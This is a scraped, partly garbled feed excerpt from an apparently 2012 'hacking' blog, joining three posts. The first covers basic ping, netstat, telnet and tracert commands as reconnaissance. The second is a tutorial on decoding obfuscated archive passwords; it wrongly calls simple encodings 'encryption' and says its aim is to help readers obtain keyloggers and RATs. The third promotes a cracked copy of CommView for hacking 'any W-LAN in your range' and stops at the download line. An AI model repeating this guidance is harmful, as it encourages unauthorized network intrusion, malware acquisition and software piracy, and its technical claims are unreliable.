&lt;div style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 19px; margin-bottom: 0.75em; margin-top: 0.25em; padding: 0px;"&gt;&lt;/div&gt;&lt;div style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 19px; margin-bottom: 0.75em; margin-top: 0.25em; padding: 0px;"&gt;Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.&lt;br /&gt;
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.&lt;br /&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWyjIzZULo1eoCrBJq_Txa4VsKmAoGjGJH8XKVll0jpgow3Q62oiRmJHp9UwabHKI-MQ-IK2wIO_LhxE3E3NKvkStOsRk_hAMxDi1irP0wN37KkKN7AU5WSDg4DZ4Gjpk0scuTomdGA8I/s1600/Ping+Google.JPG" imageanchor="1" rel="group-39" style="color: #206ba4; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"&gt;&lt;img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWyjIzZULo1eoCrBJq_Txa4VsKmAoGjGJH8XKVll0jpgow3Q62oiRmJHp9UwabHKI-MQ-IK2wIO_LhxE3E3NKvkStOsRk_hAMxDi1irP0wN37KkKN7AU5WSDg4DZ4Gjpk0scuTomdGA8I/s400/Ping+Google.JPG" style="border: 0px;" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;a href="" name="more" style="color: #206ba4; outline: none;"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;b style="color: lime; font-size: 15px;"&gt;Ping :-&lt;/b&gt;&amp;nbsp;Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.&lt;br /&gt;
To ping a particular host the syntax is (at command prompt)–&lt;/span&gt;&lt;/div&gt;&lt;div align="center" style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; margin: 0px; padding: 0px;"&gt;&lt;b&gt;c:/&amp;gt;ping hostname.com&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 19px; margin-bottom: 0.75em; margin-top: 0.25em; padding: 0px;"&gt;example:- c:/&amp;gt;ping www.google.com&lt;/div&gt;&lt;div style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 19px; margin-bottom: 0.75em; margin-top: 0.25em; padding: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b style="color: black; font-size: 15px;"&gt;&lt;span style="color: lime;"&gt;Netstat :-&lt;/span&gt;&amp;nbsp;&lt;/b&gt;It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.&lt;br /&gt;
It’s syntax is (at command prompt)–&lt;/span&gt;&lt;/div&gt;&lt;div align="center" style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; margin: 0px; padding: 0px;"&gt;&lt;b&gt;c:/&amp;gt;netstat -n&lt;/b&gt;&lt;/div&gt;&lt;div align="center" style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; margin: 0px; padding: 0px;"&gt;&lt;/div&gt;&lt;div class="separator" style="background-color: white; clear: both; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; margin: 0px; padding: 0px; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPRkNdQdfzh1RxjvMQBfH5z_ApBYEMfI54ZcITXMj6nUz4o7xGV6YEFwGbnd_qf_Oxf-E7bH0a85u1IyGh_Dy23_Tbyhd8qWe3mCglu7va2izVfIbYvKYrC32bRz_9K6rLXrHKLfyVTDY/s1600/Netstat.JPG" imageanchor="1" rel="group-52" style="color: #206ba4; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"&gt;&lt;img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPRkNdQdfzh1RxjvMQBfH5z_ApBYEMfI54ZcITXMj6nUz4o7xGV6YEFwGbnd_qf_Oxf-E7bH0a85u1IyGh_Dy23_Tbyhd8qWe3mCglu7va2izVfIbYvKYrC32bRz_9K6rLXrHKLfyVTDY/s400/Netstat.JPG" style="border: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 19px; margin-bottom: 0.75em; margin-top: 0.25em; padding: 0px;"&gt;&lt;/div&gt;&lt;div align="center" style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; margin: 0px; padding: 0px;"&gt;&lt;/div&gt;&lt;div align="center" style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; margin: 0px; padding: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b style="color: lime; font-size: 15px;"&gt;Telnet :-&amp;nbsp;&lt;/b&gt;Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.&lt;br /&gt;
The basic syntax of Telnet is (at command prompt)–&lt;/span&gt;&lt;div align="center" style="margin: 0px; padding: 0px;"&gt;&lt;b&gt;c:/&amp;gt;telnet hostname.com&lt;/b&gt;&lt;/div&gt;&lt;div style="line-height: 19px; margin-bottom: 0.75em; margin-top: 0.25em; padding: 0px;"&gt;By default telnet connects to port 23 of remote computer.&lt;br /&gt;
So, the complete syntax is-&lt;/div&gt;&lt;div align="center" style="margin: 0px; padding: 0px;"&gt;&lt;b&gt;c:/&amp;gt;telnet www.hostname.com port&lt;/b&gt;&lt;/div&gt;&lt;div style="line-height: 19px; margin-bottom: 0.75em; margin-top: 0.25em; padding: 0px;"&gt;example:- c:/&amp;gt;telnet www.yahoo.com 21 or c:/&amp;gt;telnet 192.168.0.5 21&lt;/div&gt;&lt;/div&gt;&lt;div align="center" style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; margin: 0px; padding: 0px;"&gt;&lt;/div&gt;&lt;div align="center" style="background-color: white; color: #333333; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; margin: 0px; padding: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b style="color: lime; font-size: 15px;"&gt;Tracert :-&amp;nbsp;&lt;/b&gt;It is used to trace out the route taken by the certain information i.e. data packets from source to destination.&lt;br /&gt;
It’s syntax is (at command prompt)–&lt;/span&gt;&lt;div align="center" style="margin: 0px; padding: 0px;"&gt;&lt;b&gt;c:/&amp;gt;tracert www.hostname.com&lt;/b&gt;&lt;/div&gt;&lt;div align="center" style="margin: 0px; padding: 0px;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; margin: 0px; padding: 0px;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE8qZu6WVJ-o4MZ40SeZnDRCujfObIc8u1h-W9ula1GcwnTGaZIXxy3s6r-LZoBAXor3Uy2bEX37DxFuWvhF5JVV7Z7L97YMyhWuyXSmOjIamQ1SK7tKTrv_guec-Foel9oDOgaJwZ9D4/s1600/Tracert.JPG" imageanchor="1" rel="group-61" style="color: #206ba4; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"&gt;&lt;img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE8qZu6WVJ-o4MZ40SeZnDRCujfObIc8u1h-W9ula1GcwnTGaZIXxy3s6r-LZoBAXor3Uy2bEX37DxFuWvhF5JVV7Z7L97YMyhWuyXSmOjIamQ1SK7tKTrv_guec-Foel9oDOgaJwZ9D4/s400/Tracert.JPG" style="border: 0px;" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div align="center" style="margin: 0px; padding: 0px;"&gt;&lt;/div&gt;&lt;div align="center" style="margin: 0px; padding: 0px;"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
The information obtained by using tracert command can be further used to find out exact operating system running on target system.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWyjIzZULo1eoCrBJq_Txa4VsKmAoGjGJH8XKVll0jpgow3Q62oiRmJHp9UwabHKI-MQ-IK2wIO_LhxE3E3NKvkStOsRk_hAMxDi1irP0wN37KkKN7AU5WSDg4DZ4Gjpk0scuTomdGA8I/s72-c/Ping+Google.JPG" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>How to decrypt passwords Tutorial</title><link>http://latest-cracker.blogspot.com/2012/06/how-to-decrypt-passwords-tutorial.html</link><category>hacking trick</category><pubDate>Fri, 8 Jun 2012 22:39:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-9109153468252499794</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="post-body entry-content" style="font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px; margin: 20px 0px; padding: 0px;"&gt;&lt;div id="summary6650636457990404842"&gt;&lt;div dir="ltr" trbidi="on"&gt;&lt;div style="font-family: Georgia, 'Times New Roman', serif; text-align: center;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="background-color: white; font-weight: bold;"&gt;How to&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;passwords&lt;/span&gt;&amp;nbsp;Tutorial&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="background-color: white;"&gt;&lt;br /&gt;
Probably if you're looking at this tutorial is because you don't know how to&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;passwords&lt;/span&gt;&amp;nbsp;to download keylogger, rats, etc.&lt;br /&gt;
&lt;br /&gt;
Okay my intentions of doing this tutorial are for noobs that doesn’t know how to&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;passwords&lt;/span&gt;&amp;nbsp;and they keep posting how I can&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;the password.&lt;br /&gt;
&lt;br /&gt;
First there are many ways that the people crypt password, examples:&lt;br /&gt;
&lt;b&gt;U-ASCII Encode, T-ASCII Encode, F-ASCII Encode, AER-256 Encrypt, ARMON-64 Encrypt, ATOM-128 Encrypt, BASE-64 Encrypt, ESAB-46 Encrypt, EZIP-64 Encrypt, FERON-74 Encrypt, GILA7 Encrypt, HAZZ-15 Encrypt, MEGAN-35 Encrypt, OKTO3 Encrypt, TIGO-3FX Encrypt, TRIPO-5 Encrypt, ZARA-128 Encrypt, ZONG22 Encrypt.&lt;/b&gt;&lt;br /&gt;
All these types of encryptions are found at crypo.com&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Now let's say the password is:&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
S0Q5WGZoS3FUbWhmS3kwZw==&lt;br /&gt;
And he says encrypted method&lt;i&gt;&amp;nbsp;&lt;b&gt;[TRIPO-5&amp;nbsp;-&amp;gt;&amp;nbsp;ATOM-128&amp;nbsp;-&amp;gt;&amp;nbsp;BASE-64].&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
You need to copy the password as exactly as it is, cause if you miss a letter or number it won't be the same password, and start&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;ing it from backwards since it was encrypted this way&lt;i&gt;&lt;b&gt;&amp;nbsp;[TRIPO-5&amp;nbsp;-&amp;gt;ATOM-128&amp;nbsp;-&amp;gt;&amp;nbsp;BASE-64]&lt;/b&gt;&lt;/i&gt;&amp;nbsp;you need to&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;it this way&lt;i&gt;&lt;b&gt;&amp;nbsp;[BASE-64-&amp;gt;ATOM-128-&amp;gt;TRIPO-5].&lt;/b&gt;&lt;/i&gt;&amp;nbsp;The result should be&amp;nbsp;Tutorial&amp;nbsp;, if it wasn’t Tutorial you made an error and try again following the steps I told you. If he says&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;ion method is&lt;i&gt;&lt;b&gt;&amp;nbsp;[TRIPO-5&amp;nbsp;-&amp;gt;&amp;nbsp;ATOM-128&amp;nbsp;-&amp;gt;&amp;nbsp;BASE-64]&lt;/b&gt;&lt;/i&gt;&amp;nbsp;you just&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;it like it says.&lt;br /&gt;
&lt;br /&gt;
When people say in their encryption method HEX you need to&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;it with HEX TO ASCII an example:&lt;br /&gt;
&lt;b&gt;The password is:&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
NTQgNzUgNzQgNmYgNzIgNjkgNjEgNmM=&lt;br /&gt;
Encryption method was [HEX&amp;nbsp;&lt;span style="font-weight: bold;"&gt;-&amp;gt;&lt;/span&gt;&amp;nbsp;BASE-64] you need to&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;it this way [BASE-64&amp;nbsp;&lt;span style="font-weight: bold;"&gt;-&amp;gt;&lt;/span&gt;&amp;nbsp;HEX TO ASCII ], The result should be&amp;nbsp;Tutorial, if it wasn’t Tutorial you made an error and try again following the steps I told you. HEX TO ASCII&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;ing method can be found here&lt;a href="http://www.yellowpipe.com/yis/tools/encrypter/index.php" style="text-decoration: none;" target="_blank"&gt;&amp;nbsp;YELLOWPIPE.COM&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
There are other ways of encryptions such as Backwards also called Reverser/(ed), this is found two at crypo.com, lets say another example:&lt;br /&gt;
&lt;b&gt;The password is:&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
BbaMCzGFsRA4&lt;br /&gt;
Encryption method was&amp;nbsp;&lt;b&gt;&lt;i&gt;[BACKWARDS&amp;nbsp;-&amp;gt;&amp;nbsp;FERON-74]&lt;/i&gt;&lt;/b&gt;&amp;nbsp;you need to&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;it this way [FERON-74&amp;nbsp;&lt;span style="font-weight: bold;"&gt;-&amp;gt;&lt;/span&gt;BACKWARDS ], The result should be&amp;nbsp;Tutorial, if it wasn’t Tutorial you made an error and try again following the steps I told you.&lt;br /&gt;
&lt;br /&gt;
I've seen people that have also tried to confuse people by adding to the encryption method NORMAL TEXT, in this case you don't need to do anything an example:&lt;br /&gt;
&lt;b&gt;The password is:&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
BbaMCzGFsRA4&lt;br /&gt;
&lt;br /&gt;
Encryption method was&lt;i&gt;&lt;b&gt;&amp;nbsp;[NORMAL TEXT&amp;nbsp;-&amp;gt;&amp;nbsp;BACKWARDS&amp;nbsp;-&amp;gt;&amp;nbsp;FERON-74]&amp;nbsp;&lt;/b&gt;&lt;/i&gt;you need to&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;it this way&lt;i&gt;&lt;b&gt;&amp;nbsp;[FERON-74&amp;nbsp;-&amp;gt;&amp;nbsp;BACKWARDS]&lt;/b&gt;&lt;/i&gt;&amp;nbsp;only, they add NORMAL TEXT to confuse noobs but really you just skip that way. The result should be&amp;nbsp;Tutorial, if it wasn’t Tutorial you made an error and try again following the steps I told you.&lt;br /&gt;
&lt;br /&gt;
A lot of people are asking what to do for binary look here:&lt;br /&gt;
For binary you just&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;it Binary to ACSII and for Hex you&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;it Hex to ASCII too, in example:&lt;br /&gt;
&lt;/span&gt;&lt;div class="codeblock"&gt;&lt;div class="title"&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class="title"&gt;&lt;span style="background-color: white;"&gt;Code:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;b&gt;&lt;code style="background-color: white;"&gt;30 31 30 31 30 31 30 30 20 30 31 31 31 30 31 30 31 20 30 31 31 31 30 31 30 30 20 30 31 31 30 31 31 31 31 20 30 31 31 31 30 30 31 30 20 30 31 31 30 31 30 30 31 20 30 31 31 30 30 30 30 31 20 30 31 31 30 31 31 30 30&lt;/code&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white;"&gt;&lt;br /&gt;
Encryped method:&lt;i&gt;&lt;b&gt;[ Binary -&amp;gt; Hex ]&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
To&amp;nbsp;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;decrypt&lt;/span&gt;&amp;nbsp;copy the code and then at&amp;nbsp;&lt;a href="http://www.yellowpipe.com/yis/tools/encrypter/index.php" style="text-decoration: none;" target="_blank"&gt;Yellowpipe.com&lt;/a&gt;&amp;nbsp;you select first the option Hex to ACSII then you copy the result, and then select the option Binary to ASCII,&lt;br /&gt;
The answer should be&amp;nbsp;Tutorial&amp;nbsp;if it's not try again.&lt;br /&gt;
&lt;br /&gt;
All these method of encryptions are found at:&amp;nbsp;&lt;b&gt;&lt;a href="http://crypo.com/" style="text-decoration: none;" target="_blank"&gt;CRYPO.COM&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
Other encryptions methods can be found at:&amp;nbsp;&lt;b&gt;&lt;a href="http://www.yellowpipe.com/yis/tools/encrypter/index.php" style="text-decoration: none;" target="_blank"&gt;YELLOWPIPE.COM&lt;/a&gt;.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="clear: both; color: #eeeeee;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="post-footer" style="color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 12px; line-height: 19px; padding: 0px;"&gt;&lt;br class="Apple-interchange-newline" /&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Ultimate® Wireless Hacking Guide For Beginners With Commview For WiFi</title><link>http://latest-cracker.blogspot.com/2012/06/ultimate-wireless-hacking-guide-for.html</link><category>Wireless Hacking</category><pubDate>Fri, 8 Jun 2012 22:34:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-4382682315680155731</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;p$1&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;span style="background-color: red;"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;span style="background-color: white; color: black;"&gt;&lt;/span&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/div&gt;&lt;/span&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;div style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;strong&gt;&lt;span style="background-color: #cccccc; color: black;"&gt;CommView®&lt;/span&gt;&lt;/strong&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/div&gt;&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;CommView is a powerful network monitor and analyzer designed for LAN administrators, security professionals, network programmers, home users…virtually anyone who wants a full picture of the traffic flowing through a PC or LAN segment. Loaded with many user-friendly features, CommView combines performance and flexibility with an ease of use unmatched in the industry. In this thread I will provide you with software download and Manual on how to do it all by yourself! This is the one and only most noob proof guide ever made! You will be able to hack any W-LAN in your range with ease and safety. The software provided is cracked and not infected anyhow.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;img alt="[Image: b1486ecd9d485e6e0c1aaa85376617e8.png]" border="0" height="295" src="http://www.tamos.com/upload/iblock/b1486ecd9d485e6e0c1aaa85376617e8.png" style="background-color: #151515; border-radius: 8px; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px; padding: 8px;" width="451" /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;This application captures every packet on the wire to display important information such as a list of packets and network connections, vital statistics, protocol distribution charts, and so on. You can examine, save, filter, import and export captured packets, view protocol decodes down to the lowest layer with full analysis of over 70 widespread protocols. With this information, CommView can help you pinpoint network problems and troubleshoot software and hardware.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;strong style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;How can a network analyzer help me?&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;If you are a seasoned professional, you definitely know the answer. Managing a LAN, creating network-oriented software, or performing a security audit have one thing in common: You’re blind without a good network monitor. Every day, it helps you maintain efficient network data transmission, test firewalls and intrusion detection systems, or identify problems with network-based applications. And there is an important economic reason behind using a network analyzer: it costs a fraction of the price of information, time, software, and hardware that may potentially be lost or wasted by not using a network analyzer. A number of case studies describe real-world applications of CommView in business, government, and education sectors.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;If you are new to networking, you’ll find CommView extremely useful for understanding how the Internet and your LAN work. Being a network analyzer (also commonly referred to as a packet analyzer, network monitor, or packet sniffer), it captures and decodes network traffic and makes sense of it, allowing you to see what, where, and how information leaves and enters your computer — which is critically important for a secure Internet experience. The Online Tutorial is an excellent resource for learning about the many exciting features CommView offers.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;strong style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt; What you can do with CommView:&lt;/span&gt;&lt;/strong&gt;&lt;br style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;" /&gt;&lt;span style="background-color: white;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* View detailed IP connections statistics: IP addresses, ports, sessions, etc.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Reconstruct TCP sessions.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Map packets to the application that is sending or receiving them.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* View protocols distribution, bandwidth utilization, and network nodes charts and tables.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Generate traffic reports in real time.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Browse captured and decoded packets in real time.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Search for strings or hex data in captured packet contents.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Import and export packets in Sniffer®, EtherPeek™, AiroPeek™, Observer®, NetMon, and Tcpdump formats, export packets in hex and text formats.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Configure alarms that can notify you about important events, such as suspicious packets, high bandwidth utilization, unknown addresses, etc.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Create your own plug-ins for decoding any protocol.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Exchange data with your application over TCP/IP.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Export any IP address to SmartWhois for quick, easy IP lookup.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;* Capture loopback traffic (a new, unique feature in version 4.1).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;strong style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;Commview Download:&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
